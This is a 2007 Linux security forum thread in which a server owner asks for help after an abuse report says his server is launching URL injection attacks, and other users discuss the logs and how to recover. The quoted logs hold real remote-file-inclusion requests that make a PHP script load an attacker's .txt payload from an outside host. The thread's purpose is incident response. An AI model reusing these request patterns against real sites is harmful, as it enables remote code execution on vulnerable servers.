LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 07-09-2007, 10:08 PM   #1
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

Rep: Reputation: 15
injection attacks


Hey,

Currently, we get some notice from FortressITX Abuse Dept about some one is using our server doing injection attacks against other servers.

Below are some log files they sent to us
$------------------Snap begin---------------------------$
our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET
> //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-"
> "Mozilla/5.0"
> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
> //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415
> "-" "Mozilla/5.0"
> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
> //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-"
> "Mozilla/5.0"

$----------------snap end---------------------------------$

Unfortunately, the person who is in charge of server maintaining is
away now and we can not get hold of him. Can any of you give me some
direction on how to track down the security hole and eliminate it
please?

Thanks a lot in advance!

Blessings,
Rocky
 
Old 07-10-2007, 09:39 PM   #2
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

Rep: Reputation: 158Reputation: 158
IMO, in order to prove that the attacks are 'injection attacks', they need to provide something more than what you posted. By 'injection attacks', I'm going to assume they're talking about SQL injection (it could be something else, but I'm not seeing it in those logs you provided, and SQL injection involves taking advantage of possible permissions issues on webserver backend devices, which will most likely traverse over port 80).

The logs you provided appear to be normal traffic, that, BTW, is generating 403 errors, meaning the server understood the request but rejected it. That shows that the 'attacks' aren't getting through.

Now, some of the logs don't make sense to me. I also run a webserver that sees public traffic and my logs typically don't look like:

> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET
> //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415

They look more like:

74.6.71.88 - - [10/Jul/2007:21:42:26 -0400] "GET /slackware_botlogs/2005-03/slackware.log.03Mar2005 HTTP/1.0" 404 243 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

What's throwing me off is the "//.infohttp://http://" part of the logs you posted. Unless someone (or something, like a script) is actually entering that as part of the URL...maybe the injection part of it is after (but not logged) the "?" of the URL?

Another question is the "our.server.ip.address". Why would their own IP address be showing in their own web server logs. Maybe they're doing something with their server that I typically don't do, but I've never seen my own IP within my logs, unless I'm visiting my own pages from my home internet account.

Last edited by unixfool; 07-10-2007 at 09:45 PM.
 
Old 07-11-2007, 02:23 AM   #3
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

Original Poster
Rep: Reputation: 15
Hey unixfool,

Thank you very much for your reply!

I think they are talking about URL injection attack.Below are their complain email
Quote:
IP Address of attacker: our.server.ip.address

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp:

Request: aggiebsm.org our.server.ip.address - - [04/Jul/2007:20:05:41 -0400] "GET
//oneadmin/faqsupport/include.php?path[docroot]=http://yscfortworth.org/cale
ndar/jester/sei/un/figo.txt? HTTP/1.1" 500 542 "-" "libwww-perl/5.805" - "-"

Request: impactstudentmin.com our.server.ip.address - - [04/Jul/2007:20:15:48
-0400] "GET
//oneadmin/faqsupport/include.php?path[docroot]=http://yscfortworth.org/cale
ndar/jester/sei/un/figo.txt? HTTP/1.1" 500 550 "-" "libwww-perl/5.805" - "-"

Can you help out please?

Blessings,
Rocky
 
Old 07-12-2007, 04:06 PM   #4
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 782
Blog Entries: 8

Rep: Reputation: 158Reputation: 158
So, I'm going to assume that http://yscfortworth.org/calendar/jes.../un/figo...txt is your website.

You've got issues, because, if that's your site, I tried to traverse the directory (upward) and got as far as http://yscfortworth.org/calendar before I was redirected to a site indicating that your site was compromised. Your site has basically been tagged. I suggest you either conduct an investigation of how you may have been attacked. This is important, because you want to learn from this so that your site won't be compromised again soon after you wipe out and reinstall your system. I suggest NOT repairing your existing installed, as you may miss something crucial, leaving open a backdoor (there could be more than one).

Suggested reading (recommended by unSpawn at http://www.linuxquestions.org/questi...ad.php?t=45261):

Code:
Compromise, breach of security, detection
Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html
Detecting and Removing Malicious Code (SF): http://www.securityfocus.com/infocus/1610
Steps for Recovering from a UNIX or NT System Compromise: http://www.cert.org/tech_tips/root_compromise.html
Formatting and Reinstalling after a Security Incident (SF): http://www.securityfocus.com/infocus/1692
How to Report Internet-Related Crime (usdoj.gov CCIPS): http://www.usdoj.gov/criminal/cybercrime/reporting.htm
Related, old(er) articles/docs:
Intruder Discovery/Tracking and Compromise Analysis: http://staff.washington.edu/dittrich...khat/blackhat/
Intrusion Detection Primer: http://www.linuxsecurity.com/feature...e_story-8.html
Through the Looking Glass: Finding Evidence of Your Cracker (LG): http://www.linuxgazette.com/issue36/kuethe.html
Recognizing and Recovering from Rootkit Attacks: http://www.cs.wright.edu/people/facu...on/obrien.html
See also post #5 under Forensics docs
EDIT - I rendered the .txt file URL unusable by changing figo.txt to figo...txt. It bothered me that the link was exposed.

Last edited by unixfool; 07-13-2007 at 07:40 AM.
 
Old 07-13-2007, 01:21 AM   #5
rockymaxsource
Member
 
Registered: Feb 2006
Posts: 43

Original Poster
Rep: Reputation: 15
No,http://yscfortworth.org/calendar/jester/sei/un/figo.txt is not our website. It is hosted on another server.

The only thing related to our server in log file I posted before is our.server.ip.address all the other part has nothing to do with our server.

Can any of you help me please?

Blessings,
Rocky
 
Old 07-13-2007, 01:50 AM   #6
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
Inaddition to what's been said already: please post say 20 or 30 consecutive lines that include offending ones from the log between BB code tags like this:
Code:
tac logfile | head -30 | sed "s|10.20.30.40|x.x.x.x|g" > outfile
Replace the "10.20.30.40" with the IP address of the server, don't scrub anything else and please don't use weird line breaks.
 
  


Reply

Tags
attack


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Injection wolf39us Linux - Wireless Networking 6 06-27-2007 10:38 AM
SQL Injection inaki Linux - Security 6 06-04-2007 06:42 AM
Which Firmware Allows Packet Injection on ipw2200? Sir. BOBSONATOR Linux - Wireless Networking 3 05-21-2007 01:15 AM
packet injection help? JustinHoMi Linux - Security 1 02-05-2006 08:58 AM
sql injection inaki Linux - Security 8 12-22-2005 10:41 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 09:33 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration